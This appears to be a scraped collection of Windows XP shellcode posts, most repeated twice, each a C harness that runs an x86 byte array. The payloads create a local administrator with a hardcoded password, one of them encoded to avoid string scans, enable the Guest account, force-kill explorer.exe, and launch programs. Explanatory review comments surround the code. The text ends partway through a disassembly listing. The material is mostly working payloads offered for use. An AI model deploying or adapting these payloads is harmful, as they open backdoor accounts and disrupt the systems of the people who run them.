=====================================================
win32 generic - add new local administrator 326 bytes
=====================================================
/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * 326 bytes (the author's count, not re-verified here) of x86 shellcode kept
 * in a writable global. The header says "Dynamic opcode, encoded shellcode":
 * no API names or command text appear in clear in these bytes, so a string
 * scan of the compiled binary reveals nothing about what it does, and the
 * credentials it is meant to create are only stated by the printf in main().
 * NOTE(review): the opening bytes (an FPU instruction, then what reads as
 * fnstenv [esp-0xc], a key load and a short counter) look like a GetPC stub
 * feeding a self-decoding loop, as polymorphic encoders emit -- inferred from
 * the opcodes, confirm by decoding. Byte signatures on the encoded body are
 * therefore of little use; behaviour (account creation) is the detectable part.
 */
char code[] =
"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b"
"\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a"
"\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25"
"\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2"
"\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c"
"\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe"
"\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc"
"\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71"
"\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f"
"\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53"
"\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e"
"\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43"
"\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6"
"\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4"
"\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6"
"\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5"
"\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41"
"\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0"
"\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3"
"\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06"
"\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9"
"\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa";
/*
 * Test harness: transfers control to the bytes in `code` and, if control
 * ever comes back, prints the account the shellcode is supposed to have
 * created. Casting a data array to a function pointer and calling it is
 * undefined behaviour in C; whether it runs at all depends on that memory
 * being executable, which DEP/NX normally denies for a writable global.
 * argc/argv are unused. Whether the encoded payload ever returns here
 * cannot be told from this file.
 */
int main(int argc, char **argv)
{
    void (*entry)(void) = (void (*)(void))code;

    entry();

    /* Reached only if the shellcode returns instead of ending the process. */
    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
    return 0;
}
Tuesday, August 09, 2011
win32 generic - add new local administrator 326 bytes
win32 generic - add new local administrator 326 bytes
=====================================================
win32 generic - add new local administrator 326 bytes
=====================================================
/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/
=====================================================
/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/
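#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * Same program as the full post above, restored from a collapsed copy whose
 * three #include lines had lost their <stdio.h>/<string.h>/<stdlib.h>
 * arguments (and so did not preprocess). Nothing else is changed.
 *
 * `code`: 326 bytes (author's count) of x86 shellcode in a writable global.
 * The header calls it "Dynamic opcode, encoded shellcode": no API names or
 * command text are in clear, so string scanning of the binary shows nothing;
 * NOTE(review): the first bytes read like an fnstenv-based GetPC stub and a
 * self-decoding loop -- inferred from the opcodes, confirm by decoding.
 */
char code[] =
"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b"
"\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a"
"\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25"
"\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2"
"\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c"
"\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe"
"\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc"
"\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71"
"\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f"
"\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53"
"\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e"
"\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43"
"\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6"
"\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4"
"\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6"
"\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5"
"\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41"
"\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0"
"\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3"
"\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06"
"\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9"
"\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa";

/*
 * Harness: jumps into `code` (undefined behaviour in C; needs executable
 * memory, which DEP/NX denies for a writable global) and prints the account
 * it is meant to create if control ever returns. argc/argv are unused.
 */
int main(int argc, char **argv)
{
    ((void (*)())code)();
    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
    return 0;
}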
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
====================================================================
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
====================================================================
/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * 113-byte x86 shellcode built on two hardcoded kernel32 addresses named in
 * the header (WinExec at 0x7c8623ad, ExitProcess at 0x7c81cafa). That binds
 * it to the single XP SP3 build listed above: on any other build, or under
 * ASLR, those addresses point elsewhere and it simply faults.
 * Read from the bytes: a jmp/call/pop sequence obtains the address of the
 * trailing string; 0 and that pointer are pushed and 0x7c8623ad is called;
 * then 0 is pushed and 0x7c81cafa is called, which ends the calling process,
 * so control never returns to the harness.
 * The tail starting at "\x63\x6d\x64" is plain ASCII:
 *   "cmd.exe /c net user secuid0 m0nk /add && net localgroup administrators secuid0 /add"
 * followed by its own NUL. Being stored unencoded, that command is visible
 * to any string scan of the binary, and the account creation plus the
 * administrators-group change it performs are recorded by Windows
 * account-management auditing.
 */
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
"\x64\x64\x00";
/*
 * Harness: hands control to the bytes in `code`. The cast from a data
 * array to a function pointer is undefined behaviour in C, and running a
 * writable global as code is exactly what DEP/NX exists to stop. As far as
 * the bytes read, the payload ends by calling the hardcoded ExitProcess
 * address given in the header, so on a successful run the printf below is
 * dead code: the process is gone before it executes. argc/argv are unused.
 */
int main(int argc, char **argv)
{
    void (*entry)(void) = (void (*)(void))code;

    entry();

    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
    return 0;
}
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
====================================================================
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
====================================================================
/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * 113-byte x86 shellcode built on two hardcoded kernel32 addresses named in
 * the header (WinExec at 0x7c8623ad, ExitProcess at 0x7c81cafa). That binds
 * it to the single XP SP3 build listed above: on any other build, or under
 * ASLR, those addresses point elsewhere and it simply faults.
 * Read from the bytes: a jmp/call/pop sequence obtains the address of the
 * trailing string; 0 and that pointer are pushed and 0x7c8623ad is called;
 * then 0 is pushed and 0x7c81cafa is called, which ends the calling process,
 * so control never returns to the harness.
 * The tail starting at "\x63\x6d\x64" is plain ASCII:
 *   "cmd.exe /c net user secuid0 m0nk /add && net localgroup administrators secuid0 /add"
 * followed by its own NUL. Being stored unencoded, that command is visible
 * to any string scan of the binary, and the account creation plus the
 * administrators-group change it performs are recorded by Windows
 * account-management auditing.
 */
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
"\x64\x64\x00";
/*
 * Harness: hands control to the bytes in `code`. The cast from a data
 * array to a function pointer is undefined behaviour in C, and running a
 * writable global as code is exactly what DEP/NX exists to stop. As far as
 * the bytes read, the payload ends by calling the hardcoded ExitProcess
 * address given in the header, so on a successful run the printf below is
 * dead code: the process is gone before it executes. argc/argv are unused.
 */
int main(int argc, char **argv)
{
    void (*entry)(void) = (void (*)(void))code;

    entry();

    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
    return 0;
}
win32/xp pro sp3 MessageBox shellcode
/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) # ( runs a MessageBox that shows an error message )
website : Www.AttackerZ.ir
spt : All friends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * 11 bytes: xor edx,edx; four "push edx" (four zero arguments); then an
 * e8 rel32 call. Because the call is relative, its target depends on where
 * this array happens to be loaded: it is not position-independent and only
 * reaches a MessageBox routine at the exact address layout of the author's
 * build. NOTE(review): the four zero arguments presumably form a
 * MessageBoxA(NULL, NULL, NULL, 0) call, per the header -- not verified here.
 */
char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
/*
 * Harness: jumps into the bytes of `code`. Calling a data array as a
 * function is undefined behaviour in C and requires the array's memory to
 * be executable, which DEP/NX normally denies for a writable global.
 * argc/argv are unused; exit status is 0 if the call ever returns.
 */
int main(int argc, char **argv)
{
    void (*entry)(void) = (void (*)(void))code;

    entry();
    return 0;
}
win32/xp pro sp3 MessageBox shellcode
/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) # ( runs a MessageBox that shows an error message )
website : Www.AttackerZ.ir
spt : All friends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * 11 bytes: xor edx,edx; four "push edx" (four zero arguments); then an
 * e8 rel32 call. Because the call is relative, its target depends on where
 * this array happens to be loaded: it is not position-independent and only
 * reaches a MessageBox routine at the exact address layout of the author's
 * build. NOTE(review): the four zero arguments presumably form a
 * MessageBoxA(NULL, NULL, NULL, 0) call, per the header -- not verified here.
 */
char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
/*
 * Harness: jumps into the bytes of `code`. Calling a data array as a
 * function is undefined behaviour in C and requires the array's memory to
 * be executable, which DEP/NX normally denies for a writable global.
 * argc/argv are unused; exit status is 0 if the call ever returns.
 */
int main(int argc, char **argv)
{
    void (*entry)(void) = (void (*)(void))code;

    entry();
    return 0;
}
Activate Guest Account Shellcode
#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * 67-byte variant of the same prologue as the "add local administrator"
 * post above: jmp/call/pop to get the address of the trailing string, push
 * 0 and that pointer, call the hardcoded 0x7c8623ad (WinExec on the XP SP3
 * build the sibling post names), then push 0 and call 0x7c81cafa
 * (ExitProcess), so the host process ends and control never returns here.
 * Hardcoded addresses tie it to that one build; ASLR or any other build
 * breaks it. The tail from "\x63\x6d\x64" on is plain ASCII,
 *   "cmd.exe /c net user guest /active:yes"
 * plus its NUL, so the command is visible to a string scan of the binary
 * and the enabling of the Guest account is an audited account change.
 */
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x67\x75\x65\x73\x74\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00";
/*
 * Harness: hands control to the bytes in `code` (undefined behaviour in C;
 * needs executable memory, which DEP/NX denies for a writable global). As
 * far as the bytes read, the payload ends with a call to a hardcoded
 * ExitProcess address, so the printf below is never reached on a
 * successful run. argc/argv are unused.
 */
int main(int argc, char **argv)
{
    void (*entry)(void) = (void (*)(void))code;

    entry();

    printf("Guest Account Activated");
    return 0;
}
Activate Guest Account Shellcode
#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * 67-byte variant of the same prologue as the "add local administrator"
 * post above: jmp/call/pop to get the address of the trailing string, push
 * 0 and that pointer, call the hardcoded 0x7c8623ad (WinExec on the XP SP3
 * build the sibling post names), then push 0 and call 0x7c81cafa
 * (ExitProcess), so the host process ends and control never returns here.
 * Hardcoded addresses tie it to that one build; ASLR or any other build
 * breaks it. The tail from "\x63\x6d\x64" on is plain ASCII,
 *   "cmd.exe /c net user guest /active:yes"
 * plus its NUL, so the command is visible to a string scan of the binary
 * and the enabling of the Guest account is an audited account change.
 */
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x67\x75\x65\x73\x74\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00";
/*
 * Harness: hands control to the bytes in `code` (undefined behaviour in C;
 * needs executable memory, which DEP/NX denies for a writable global). As
 * far as the bytes read, the payload ends with a call to a hardcoded
 * ExitProcess address, so the printf below is never reached on a
 * successful run. argc/argv are unused.
 */
int main(int argc, char **argv)
{
    void (*entry)(void) = (void (*)(void))code;

    entry();

    printf("Guest Account Activated");
    return 0;
}
Windows Magnifier Shellcode
#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
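/*
 * Harness for the 52-byte "magnify" shellcode: prints the byte count, then
 * jumps into the stack buffer (undefined behaviour in C; it can only run
 * where the stack is executable, which DEP/NX normally prevents).
 *
 * Fix vs. the original: strlen() returns size_t, which must be printed with
 * "%zu" -- handing it to "%d" is undefined behaviour -- and strlen() takes a
 * const char *, so the unsigned char array is cast explicitly instead of
 * relying on an incompatible-pointer conversion that compilers only warn on.
 *
 * Read from the bytes: jmp/call/pop obtains the address of the trailing
 * ASCII "cmd.exe /c magnify"; 0 and that pointer are pushed and the
 * hardcoded 0x7c8623ad (WinExec on the XP SP3 build named in the sibling
 * posts) is called, then push 0 / call 0x7c81cafa (ExitProcess), so control
 * never returns here. NOTE(review): the "\x88\x43\x35" store
 * (mov [ebx+0x35], al) writes a zero 0x35 bytes past the string start,
 * beyond both the 18-char command and the end of this array, so the
 * terminator actually in effect is the NUL the C string literal appends --
 * inferred from the opcodes, confirm in a debugger.
 */
int main(void)
{
    unsigned char shellcode[] =
    "\xeb\x1b\x5b\x31\xc0\x50\x31"
    "\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
    "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
    "\x6d\x61\x67\x6e\x69\x66\x79";

    printf("Size = %zu bytes\n", strlen((const char *)shellcode));
    ((void (*)())shellcode)();
    return 0;
}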
Windows Magnifier Shellcode
#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
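/*
 * Harness for the 52-byte "magnify" shellcode: prints the byte count, then
 * jumps into the stack buffer (undefined behaviour in C; it can only run
 * where the stack is executable, which DEP/NX normally prevents).
 *
 * Fix vs. the original: strlen() returns size_t, which must be printed with
 * "%zu" -- handing it to "%d" is undefined behaviour -- and strlen() takes a
 * const char *, so the unsigned char array is cast explicitly instead of
 * relying on an incompatible-pointer conversion that compilers only warn on.
 *
 * Read from the bytes: jmp/call/pop obtains the address of the trailing
 * ASCII "cmd.exe /c magnify"; 0 and that pointer are pushed and the
 * hardcoded 0x7c8623ad (WinExec on the XP SP3 build named in the sibling
 * posts) is called, then push 0 / call 0x7c81cafa (ExitProcess), so control
 * never returns here. NOTE(review): the "\x88\x43\x35" store
 * (mov [ebx+0x35], al) writes a zero 0x35 bytes past the string start,
 * beyond both the 18-char command and the end of this array, so the
 * terminator actually in effect is the NUL the C string literal appends --
 * inferred from the opcodes, confirm in a debugger.
 */
int main(void)
{
    unsigned char shellcode[] =
    "\xeb\x1b\x5b\x31\xc0\x50\x31"
    "\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
    "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
    "\x6d\x61\x67\x6e\x69\x66\x79";

    printf("Size = %zu bytes\n", strlen((const char *)shellcode));
    ((void (*)())shellcode)();
    return 0;
}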
win32/xp sp3 Force Kill explorer.exe process
#(+) Exploit Title: win32/xp sp3 Force Kill explorer.exe process Shellcode 73 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
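/*
 * Harness for the 73-byte "kill explorer.exe" shellcode: prints the byte
 * count, then jumps into the stack buffer (undefined behaviour in C; it can
 * only run where the stack is executable, which DEP/NX normally prevents).
 *
 * Fix vs. the original: strlen() returns size_t, which must be printed with
 * "%zu" -- handing it to "%d" is undefined behaviour -- and strlen() takes a
 * const char *, so the unsigned char array is cast explicitly instead of
 * relying on an incompatible-pointer conversion that compilers only warn on.
 *
 * Read from the bytes: same prologue as the "magnify" post -- jmp/call/pop
 * to the trailing ASCII "cmd.exe /c TASKKILL /F /IM explorer.exe", push 0
 * and that pointer, call the hardcoded 0x7c8623ad (WinExec on the XP SP3
 * build named in the sibling posts), then push 0 / call 0x7c81cafa
 * (ExitProcess), so control never returns here. The command is stored in
 * clear, so it is visible to a string scan of the binary. NOTE(review): the
 * "\x88\x43\x35" store (mov [ebx+0x35], al) lands 0x35 bytes past the
 * string start, past both the 39-char command and the end of this array;
 * the terminator actually in effect is the NUL the C literal appends --
 * inferred from the opcodes, confirm in a debugger.
 */
int main(void)
{
    unsigned char shellcode[] =
    "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3"
    "\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x54\x41\x53\x4b"
    "\x4b\x49\x4c\x4c\x20\x2f\x46\x20\x2f\x49\x4d\x20\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e\x65\x78\x65";

    printf("Size = %zu bytes\n", strlen((const char *)shellcode));
    ((void (*)())shellcode)();
    return 0;
}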
win32/xp sp3 Force Kill explorer.exe process
#(+) Exploit Title: win32/xp sp3 Force Kill explorer.exe process Shellcode 73 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
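/*
 * Harness for the 73-byte "kill explorer.exe" shellcode: prints the byte
 * count, then jumps into the stack buffer (undefined behaviour in C; it can
 * only run where the stack is executable, which DEP/NX normally prevents).
 *
 * Fix vs. the original: strlen() returns size_t, which must be printed with
 * "%zu" -- handing it to "%d" is undefined behaviour -- and strlen() takes a
 * const char *, so the unsigned char array is cast explicitly instead of
 * relying on an incompatible-pointer conversion that compilers only warn on.
 *
 * Read from the bytes: same prologue as the "magnify" post -- jmp/call/pop
 * to the trailing ASCII "cmd.exe /c TASKKILL /F /IM explorer.exe", push 0
 * and that pointer, call the hardcoded 0x7c8623ad (WinExec on the XP SP3
 * build named in the sibling posts), then push 0 / call 0x7c81cafa
 * (ExitProcess), so control never returns here. The command is stored in
 * clear, so it is visible to a string scan of the binary. NOTE(review): the
 * "\x88\x43\x35" store (mov [ebx+0x35], al) lands 0x35 bytes past the
 * string start, past both the 39-char command and the end of this array;
 * the terminator actually in effect is the NUL the C literal appends --
 * inferred from the opcodes, confirm in a debugger.
 */
int main(void)
{
    unsigned char shellcode[] =
    "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3"
    "\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x54\x41\x53\x4b"
    "\x4b\x49\x4c\x4c\x20\x2f\x46\x20\x2f\x49\x4d\x20\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e\x65\x78\x65";

    printf("Size = %zu bytes\n", strlen((const char *)shellcode));
    ((void (*)())shellcode)();
    return 0;
}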
VB6_vbaExceptHandler - SEH (calc.exe) ShellCode
# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
// TesT Project >> Compile As Name k3d4n5.exe <<
/*
004018E0 > 55 | PUSH EBP
004018E1 . 8BEC | MOV EBP,ESP
004018E3 . 83EC 0C | SUB ESP,0C
004018E6 . 68 96104000 | PUSH <JMP.&MSVBVM60.__vbaExceptHandler> ; SE handler installation (SEH)
004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]
004018F1 . 50 | PUSH EAX
004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP
004018F9 . 83EC 30 | SUB ESP,30
004018FC . 53 | PUSH EBX
004018FD . 56 | PUSH ESI
004018FE . 57 | PUSH EDI
004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP
00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080
00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8]
0040190C . 8BC8 | MOV ECX,EAX
0040190E . 83E1 01 | AND ECX,1
00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX
00401914 . 24 FE | AND AL,0FE
00401916 . 50 | PUSH EAX
00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX
0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX]
0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4]
0040191F . 33F6 | XOR ESI,ESI
00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34]
00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI
00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI
0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe
00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8
0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup
00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24]
00401944 . 6A 02 | PUSH 2
